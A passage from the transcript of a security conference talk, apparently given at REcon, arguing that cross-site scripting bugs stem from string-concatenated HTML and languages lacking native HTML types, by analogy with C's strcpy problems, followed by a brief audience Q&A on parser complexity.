And if the behavior of the client changes, perhaps because of a new browser release, or because of some undocumented feature or behavior of the browser that the creators of the site did not anticipate, the security of the whole thing can be impacted. The final reason for these problems, I think, is the programming languages we use, and I want to make an analogy with C and strcpy. C does not have a native string type. However, strings turned out to be pretty useful in programming, and pretty much every program has to deal with them, so people started simulating the string type using arrays of characters, using different approaches, and a lot of people wrote their own string implementations and string libraries, and a lot of those implementations were just unsafe. If C had a native string type similar to the one in Pascal, with the length of the string stored at the beginning, then all of the string copy vulnerabilities we've seen over the last 20 years would just not exist. Similarly, in the web world we have a mismatch between what the programming languages provide and what the developers actually deal with as data. The way most of these websites are created is by string concatenation: even though the developers are dealing with HTML and manipulating HTML, their languages don't provide a native HTML or XML data type, so you have to write your own implementation, your own parsers, your own validators, and there are a lot of ways to get that wrong. If we had a programming language that supported this natively, and perhaps did not even have raw strings at all, to force developers to use the proper approach, then I think the incidence of these cross-site scripting bugs would drop dramatically.

And finally, this talk was not just about web security, it was also about black-box reversing, and this is REcon after all. I find web application reversing kind of exciting because it's different and sort of challenging. We're at the point where we need much better tools and automation, so there is still the possibility of creating something new and coming up with a cool new tool that does something interesting. I think it will be a pretty interesting topic to pursue in the future. So that's all. If you have any questions... there's the question slide. I think we're out of time, so the next speaker should come up. Do we have time for a question? Okay, great. Do you have a question?

[Audience question, partly inaudible, relating the complexity of parsing formats like ASN.1 to the problems with HTML parsers.]

We have not seen very many problems with parsers for comma-delimited text files, because the format is just simpler. So if you're building a format, try to make it as simple as possible and as well defined as possible; that's my advice as a good guy. As a bad guy, you should definitely use HTML, and you should add some custom features to it.